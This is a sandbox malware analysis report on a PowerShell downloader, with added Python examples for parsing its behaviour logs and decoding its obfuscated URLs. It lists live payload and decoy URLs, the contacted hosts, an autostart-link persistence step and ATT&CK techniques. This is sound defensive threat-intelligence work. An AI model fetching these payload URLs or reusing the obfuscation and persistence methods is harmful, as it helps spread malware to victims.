      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
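The behavior lines above arrive, when the report is scraped, with the process image, the action and the page's "Jump to behavior" link run together, and the same catalog-file check is logged up to eleven times in a row. The following is an added example, not code from the report or from Joe Sandbox: a small normaliser that parses lines in that fused form, collapses consecutive repeats, and flags queried paths that sit outside the Windows and .NET directories. On this report's data that singles out the AutoItX PowerShell module under Program Files (x86); nothing on this page shows the sample installing it, but it is exactly the kind of path a triage pass should surface for a look. The sample lines are copies of four lines from the report, and the set of roots treated as OS-owned is an assumption of this example rather than anything the report states.

```python
import re

# Constructed sample input: four behavior lines in the fused form in which
# the report text arrives when scraped. They are copies of lines from the
# report above, not new observations.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior",
    r"Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)"            # process image; ends at the first ".exe"
    r"\s*Queries volume information:\s*"        # the action, fused or not
    r"(?P<path>.+?)\s+"                         # queried object (may contain spaces)
    r"(?P<api>VolumeInformation)"
    r"(?:Jump to behavior)?\s*$",               # page-link residue, if present
    re.IGNORECASE,
)

# Assumption of this example, not a statement of the report: paths under
# these roots (and the volume root itself) are treated as OS-owned.
OS_ROOTS = ("c:\\windows\\", "c:\\programdata\\microsoft\\")


def parse_line(line):
    """Split one fused behavior line into process, path and API.
    Returns None for lines that are not volume-information queries."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"proc": m["proc"], "path": m["path"], "api": m["api"]}


def collapse_runs(records):
    """Merge consecutive records with the same process and path into
    (proc, path, count) tuples, preserving the original order."""
    runs = []
    for rec in records:
        if runs and runs[-1][0] == rec["proc"] and runs[-1][1] == rec["path"]:
            runs[-1] = (rec["proc"], rec["path"], runs[-1][2] + 1)
        else:
            runs.append((rec["proc"], rec["path"], 1))
    return runs


def classify(path):
    """'os' for OS/.NET locations, 'review' for anything else."""
    p = path.lower()
    return "os" if p == "c:\\" or p.startswith(OS_ROOTS) else "review"


def summarize(lines):
    """Parse, collapse and classify a list of behavior lines."""
    records = [r for r in map(parse_line, lines) if r]
    runs = collapse_runs(records)
    review = sorted({path for _, path, _ in runs if classify(path) == "review"})
    return {"parsed": len(records), "runs": runs, "review": review}


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for proc, path, n in result["runs"]:
        name = proc.rsplit("\\", 1)[-1]
        print(f"{n:3d}x  {name:15s} {path}")
    print("paths to review:", result["review"])
```

Feed it the whole behavior section of a report and the `runs` list reproduces the collapsed listing above; the `review` list is what to look at first.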
MITRE ATT&CK matrix. A leading number is the count of matched signatures for that technique; cells without a number are the unmatched entries of the matrix template.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 PowerShell | 1 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 21 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1578233. Sample: gCXzb0K8Ci.ps1. Start date: 19/12/2024. Architecture: WINDOWS. Score: 84. The numbers in brackets after a process are the per-process counts shown in the graph (created registry values and created files, see the legend above).

Start
  DNS/IP: x1.i.lencr.org
  DNS/IP: www.bluemaxxlaser.com
  DNS/IP: 5 other IPs or domains
  Signature: Antivirus / Scanner detection for submitted sample
  Signature: Multi AV Scanner detection for submitted file
  Signature: Yara detected Powershell download and execute
  Signature: 3 other signatures
  started: powershell.exe [16 23]
  started: svchost.exe

powershell.exe [16 23]
  DNS/IP: www.bluemaxxlaser.com 203.175.174.69, 49705, 80, SGGS-AS-APSGGSSG, Singapore
  DNS/IP: astenterprises.com.pk 107.161.23.150, 443, 49704, RAMNODEUS, United States
  Signature: Powershell creates an autostart link
  started: powershell.exe [23]
  started: Acrobat.exe [18 61]
  started: conhost.exe

svchost.exe
  DNS/IP: 127.0.0.1 unknown unknown

powershell.exe [23] (child of the first powershell.exe)
  Signature: Loading BitLocker PowerShell Module

Acrobat.exe [18 61]
  started: AcroCEF.exe [106]

AcroCEF.exe [106]
  started: AcroCEF.exe

Source | Detection | Scanner | Label | Link
gCXzb0K8Ci.ps1 | 34% | ReversingLabs | Script-PowerShell.Downloader.Boxter |
gCXzb0K8Ci.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe |
https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p | 0% | Avira URL Cloud | safe |
http://www.bluhwamaxxlashwar.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |

The URLs in this second table are scanned exactly as written. Two of them are the obfuscated forms recovered from powershell.exe memory, not hostnames the sample ever resolved (compare the domain table below, where the contacted hosts are www.bluemaxxlaser.com and www.astenterprises.com.pk), so a "safe" URL-cloud verdict on those strings says nothing about the infrastructure actually used.
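The strings found in memory (www.bluhwamaxxlashwar.com, www.asthwanthwarprishwas.com.pk) differ from the hosts the sandbox resolved (www.bluemaxxlaser.com, www.astenterprises.com.pk) only in that the substring "hwa" stands in for the letter "e"; the same substitution turns "List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p" into the PDF request the sandbox recorded. The following is an added example, not code from the report or from the sample: it recovers that token by brute force from the report's own strings and maps each decoded URL to the request actually observed. The hosts and URLs in the block are copied from the tables on this page; the script's own decoding routine is not shown anywhere on the page, so treating it as a plain string replacement, and the maximum token length of four, are assumptions of this example.

```python
import string
from urllib.parse import unquote, urlsplit

# Copied from the report's URL tables: strings found in powershell.exe
# memory and in the script itself ...
OBFUSCATED = [
    "http://www.bluhwamaxxlashwar.com/ms/ms.vbs",
    "https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p",
]
# ... and the hosts and URLs the sandbox saw on the wire.
RESOLVED_HOSTS = {"www.bluemaxxlaser.com", "astenterprises.com.pk", "www.astenterprises.com.pk"}
OBSERVED_URLS = {
    "http://www.bluemaxxlaser.com/ms/ms.vbs",
    "https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf",
}


def recover_token(obf_host, known_hosts, max_len=4):
    """Brute-force the (token, letter) pair such that replacing every
    occurrence of token with letter turns obf_host into a known host.
    Returns None when no single-token substitution explains the string.
    (Assumption: the obfuscation is a plain substring replacement.)"""
    for n in range(2, max_len + 1):
        for i in range(len(obf_host) - n + 1):
            tok = obf_host[i:i + n]
            for letter in string.ascii_lowercase:
                if obf_host.replace(tok, letter) in known_hosts:
                    return tok, letter
    return None


def deobfuscate(url, tok, letter):
    """Apply the recovered substitution to the whole URL."""
    return url.replace(tok, letter)


def match_observed(decoded, observed_urls):
    """Memory strings are often cut off; accept a decoded URL that is a
    prefix of a URL the sandbox actually requested."""
    for u in observed_urls:
        if u.startswith(decoded):
            return u
    return None


def analyse(obfuscated=OBFUSCATED, hosts=RESOLVED_HOSTS, observed=OBSERVED_URLS):
    """For each obfuscated string: the token found, the decoded URL, the
    observed request it corresponds to (or None) and the unquoted path."""
    results = []
    for url in obfuscated:
        host = urlsplit(url).hostname
        pair = recover_token(host, hosts)
        if pair is None:
            results.append({"obfuscated": url, "token": None, "decoded": None,
                            "observed": None, "path": None})
            continue
        decoded = deobfuscate(url, *pair)
        results.append({
            "obfuscated": url,
            "token": pair,
            "decoded": decoded,
            "observed": match_observed(decoded, observed),
            "path": unquote(urlsplit(decoded).path),
        })
    return results


if __name__ == "__main__":
    for r in analyse():
        print(r["obfuscated"])
        print("  token:   ", r["token"])
        print("  decoded: ", r["decoded"])
        print("  observed:", r["observed"])
        print("  path:    ", r["path"])
```

The first string decodes to exactly the VBS URL fetched over port 80; the second decodes to a prefix of the PDF request because the memory string itself ends at ".p". Once the token is known, the same replacement can be applied to every other string in the memory dumps, which is the quickest way to check whether the report's URL tables are hiding further infrastructure behind the same trick.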
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.99 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | | high
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | | high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                          high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://go.micropowershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A89D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.microsoft.copowershell.exe, 00000000.00000002.2319223440.00000293F7970000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.ppowershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
| URL | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://contoso.com/Icon | powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://crl.ver) | svchost.exe, 00000007.00000002.3274345952.0000028B56800000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000007.00000003.2170632442.0000028B565C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | false | | high |
| http://go.micros | powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.bluhwamaxxlashwar.com/ms/ms.vbs | powershell.exe, 00000000.00000002.2219015938.0000029380232000.00000004.00000800.00020000.00000000.sdmp, gCXzb0K8Ci.ps1 | true | Avira URL Cloud: safe | unknown |
| https://g.live.com/odclientsettings/Prod/C: | edb.log.7.dr | false | | high |
| http://astenterprises.com.pk | powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.bluemaxxlaser.com | powershell.exe, 00000000.00000002.2219015938.0000029381B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false |
| 107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false |

Private IPs contacted:

| IP |
|---|
| 127.0.0.1 |
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1578233
                                                                        Start date and time:2024-12-19 12:50:19 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 32s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:gCXzb0K8Ci.ps1
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24.ps1
                                                                        Detection:MAL
                                                                        Classification:mal84.evad.winPS1@20/59@5/3
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 83%
                                                                        • Number of executed functions: 5
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .ps1
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.137, 18.213.11.84, 50.16.47.176, 54.224.241.105, 34.237.241.83, 162.159.61.3, 172.64.41.3, 217.20.58.99, 92.122.16.236, 23.195.61.56, 23.32.239.56, 2.19.198.27, 23.32.239.9, 13.107.246.63, 20.12.23.50, 3.219.243.226, 23.41.168.139
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 2696 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6392 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: gCXzb0K8Ci.ps1
| Time | Type | Description |
|---|---|---|
| 06:51:10 | API Interceptor | 68x Sleep call for process: powershell.exe modified |
| 06:51:22 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 06:51:32 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified |
| IP | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 203.175.174.69 | KcKtHBkskI.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | 1M1QoJF40r.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | R7FBVcp1tf.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | 2rTi9MgX25.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
| | ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
| | FjfZ7uM8zh.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | yswmdaREME.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| | 0bNBLjPn56.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 107.161.23.150 | H6epOhxoPY.ps1 | malicious | Unknown | |
| | KcKtHBkskI.ps1 | malicious | Unknown | |
| | 1M1QoJF40r.ps1 | malicious | Unknown | |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | |
| | R7FBVcp1tf.ps1 | malicious | Unknown | |
| | 2rTi9MgX25.ps1 | malicious | Unknown | |
| | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | |
| | FjfZ7uM8zh.lnk | malicious | Unknown | |
| | yswmdaREME.lnk | malicious | Unknown | |
| | 0bNBLjPn56.lnk | malicious | Unknown | |
| Domain | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| www.bluemaxxlaser.com | KcKtHBkskI.ps1 | malicious | Unknown | 203.175.174.69 |
| | 1M1QoJF40r.ps1 | malicious | Unknown | 203.175.174.69 |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69 |
| | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69 |
| | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69 |
| | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69 |
| | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69 |
| | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69 |
| | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69 |
| | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69 |
| bg.microsoft.map.fastly.net | KcKtHBkskI.ps1 | malicious | Unknown | 199.232.214.172 |
| | 1M1QoJF40r.ps1 | malicious | Unknown | 199.232.210.172 |
| | StGx54oFh6.exe | malicious | Quasar | 199.232.214.172 |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | 199.232.214.172 |
| | R7FBVcp1tf.ps1 | malicious | Unknown | 199.232.210.172 |
| | 2rTi9MgX25.ps1 | malicious | Unknown | 199.232.210.172 |
| | LFLtlBAuf7.exe | malicious | Quasar | 199.232.210.172 |
| | FjfZ7uM8zh.lnk | malicious | Unknown | 199.232.210.172 |
| | yswmdaREME.lnk | malicious | Unknown | 199.232.214.172 |
| | 0bNBLjPn56.lnk | malicious | Unknown | 199.232.210.172 |
| ASN Name | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| RAMNODEUS | H6epOhxoPY.ps1 | malicious | Unknown | 107.161.23.150 |
| | KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150 |
| | 1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150 |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150 |
| | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150 |
| | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150 |
| | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150 |
| | FjfZ7uM8zh.lnk | malicious | Unknown | 107.161.23.150 |
| | yswmdaREME.lnk | malicious | Unknown | 107.161.23.150 |
| | 0bNBLjPn56.lnk | malicious | Unknown | 107.161.23.150 |
| SGGS-AS-APSGGSSG | H6epOhxoPY.ps1 | malicious | Unknown | 203.175.174.69 |
| | KcKtHBkskI.ps1 | malicious | Unknown | 203.175.174.69 |
| | 1M1QoJF40r.ps1 | malicious | Unknown | 203.175.174.69 |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69 |
| | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69 |
| | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69 |
| | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69 |
| | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69 |
| | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69 |
| | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69 |
| JA3 Fingerprint | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 3b5074b1b5d032e5620f69f9f700ff0e | H6epOhxoPY.ps1 | malicious | Unknown | 107.161.23.150 |
| | KcKtHBkskI.ps1 | malicious | Unknown | 107.161.23.150 |
| | 1M1QoJF40r.ps1 | malicious | Unknown | 107.161.23.150 |
| | StGx54oFh6.exe | malicious | Quasar | 107.161.23.150 |
| | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150 |
